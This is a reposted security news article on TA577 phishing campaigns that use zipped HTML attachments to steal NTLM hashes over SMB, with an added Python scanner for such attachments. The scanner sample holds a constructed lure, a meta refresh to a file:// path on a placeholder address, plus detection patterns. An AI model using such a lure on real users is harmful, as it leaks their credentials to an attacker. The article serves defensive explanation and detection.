TA577 uses ZIP attachments to steal NTLM hashes

Posted by admin on 2024-03-08 08:17:06

The threat actor known as TA577 has been observed using ZIP archive attachments in phishing emails with the aim of stealing NT LAN Manager (NTLM) hashes.

The new attack chain "can be used for sensitive information gathering purposes and to enable follow-on activity," enterprise security firm Proofpoint said in a Monday report.

At least two campaigns using this approach were observed on February 26 and 27, 2024, the company added. The phishing waves sent thousands of messages and targeted hundreds of organizations across the world.

The messages themselves appeared as replies to earlier emails, a known technique called thread hijacking, in a bid to increase the likelihood that the target opens the attachment.

The ZIP attachments, which are the most common delivery mechanism, contain an HTML file designed to contact an actor-controlled Server Message Block (SMB) server. Any HTML page that references a remote file:// or UNC path (\\host\share\file) causes Windows to open an SMB connection to that host and, with default settings, to authenticate with the logged-on user's NTLM credentials; no macro or executable is needed.

"TA577's objective is to capture NTLMv2 Challenge/Response pairs from the SMB server to steal NTLM hashes based on characteristics of the attack chain and tools used," the company said, which could then be used for pass-the-hash (PtH) type attacks.
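The lure described above, an HTML page whose meta refresh (or an image, link or script reference) points at a remote file:// or UNC path so that Windows authenticates to the attacker's SMB server, can be caught before delivery. The scanner below is an added example, not code from the article or from Proofpoint: it opens a ZIP in memory, pulls out HTML-like members and reports every file:// or \\host\share reference they carry. The sample archive, the invoice.html name and the 203.0.113.10 address are constructed here for illustration, and the meta-refresh-to-file:// form is assumed as one typical lure layout rather than taken from the page.

```python
import io
import re
import zipfile
from html.parser import HTMLParser

# Matches file:// and file:\\ URLs as well as bare UNC paths such as \\203.0.113.10\share\doc.txt.
# The UNC alternative requires a host, a backslash and a share/path component.
SMB_REF_RE = re.compile(
    r'(?i)\bfile:(?://|\\\\)[^\s"\'<>]+'      # file://host/share/... or file:\\host\share\...
    r'|\\\\[A-Za-z0-9._-]+\\[^\s"\'<>]+'      # \\host\share\...
)


class SmbRefScanner(HTMLParser):
    """Collect every attribute value or text node that references an SMB/UNC location."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # Covers <meta http-equiv="refresh" content="0; url=file://...">, <img src>, <iframe src>,
        # <link href>, <script src> and any other attribute carrying a URL.
        for name, value in attrs:
            if value:
                for match in SMB_REF_RE.findall(value):
                    self.hits.append(f"<{tag} {name}> {match}")

    def handle_data(self, data):
        # Inline <script> bodies (window.location = "file://...") and plain text nodes.
        for match in SMB_REF_RE.findall(data):
            self.hits.append(f"text/script {match}")


def find_smb_refs(html_text: str) -> list:
    scanner = SmbRefScanner()
    scanner.feed(html_text)
    scanner.close()
    return scanner.hits


def scan_zip(zip_bytes: bytes) -> dict:
    """Return {member_name: [hits]} for every HTML-like member that references an SMB location."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if not info.filename.lower().endswith((".html", ".htm", ".hta", ".mhtml", ".xhtml")):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            hits = find_smb_refs(text)
            if hits:
                findings[info.filename] = hits
    return findings


# Constructed sample lure (not a real TA577 artifact): a meta refresh to a remote file:// path.
# 203.0.113.10 is a documentation-range address used as a placeholder.
LURE_HTML = (
    b'<html><head><meta http-equiv="refresh" '
    b'content="0; url=file://203.0.113.10/share/document.txt"></head>'
    b"<body>Loading document...</body></html>"
)
BENIGN_HTML = b'<html><body><a href="https://example.com/report">report</a></body></html>'


def build_sample_zip() -> bytes:
    """Build the constructed sample archive in memory: one lure, one benign page, one text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.html", LURE_HTML)
        zf.writestr("notes.html", BENIGN_HTML)
        zf.writestr("readme.txt", b"nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for member, hits in scan_zip(build_sample_zip()).items():
        for hit in hits:
            print(f"{member}: {hit}")
```

Run it over a quarantined attachment with `scan_zip(open(path, "rb").read())`; a non-empty result for a mail-borne archive is worth an alert on its own, because there is no legitimate reason for an emailed HTML file to reach out to a share on the internet.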


This means that adversaries who hold an account's NT hash do not need the underlying password to authenticate, which lets them move laterally through a network and reach valuable data. A captured NTLMv2 challenge/response pair is not that hash, however: it is an HMAC keyed by the NT hash over a server challenge the attacker chose, so it cannot be replayed for pass-the-hash. Its value lies in offline cracking (guess a password, recompute the response, compare), which recovers the password and with it the NT hash, or in relaying the authentication in real time to another service that accepts NTLM.

TA577, which overlaps with an activity cluster tracked by Trend Micro as Water Curupira, is one of the most sophisticated cybercrime groups. It has been linked to the distribution of malware families such as QakBot and PikaBot in the past.

"The rate at which TA577 adopts and distributes new tactics, techniques, and procedures (TTPs) suggests the threat actor likely has the time, resources, and experience to rapidly iterate and test new delivery methods," Proofpoint said.

It also described the threat actor as acutely aware of shifts in the cyber threat landscape, quickly adapting and refining its tradecraft and delivery methods to bypass detection and drop a variety of payloads. Organizations are strongly advised to block outbound SMB (TCP 445, and TCP 139 for legacy NetBIOS sessions) at both the perimeter and the host firewall so that a lure cannot reach the attacker's server; restricting outgoing NTLM traffic to remote servers through the "Network security: Restrict NTLM" Group Policy settings also covers the WebDAV fallback that Windows attempts when port 445 is blocked.


References

[1] https://thehackernews.com/2024/03/warning-thread-hijacking-attack-targets.html


Originally published on the WeChat public account 知机安全: TA577 uses ZIP attachments to steal NTLM hashes

Reposted on CN-SEC中文网 (keep this link when reproducing): TA577 uses ZIP attachments to steal NTLM hashes, http://cn-sec.com/archives/2551227.html
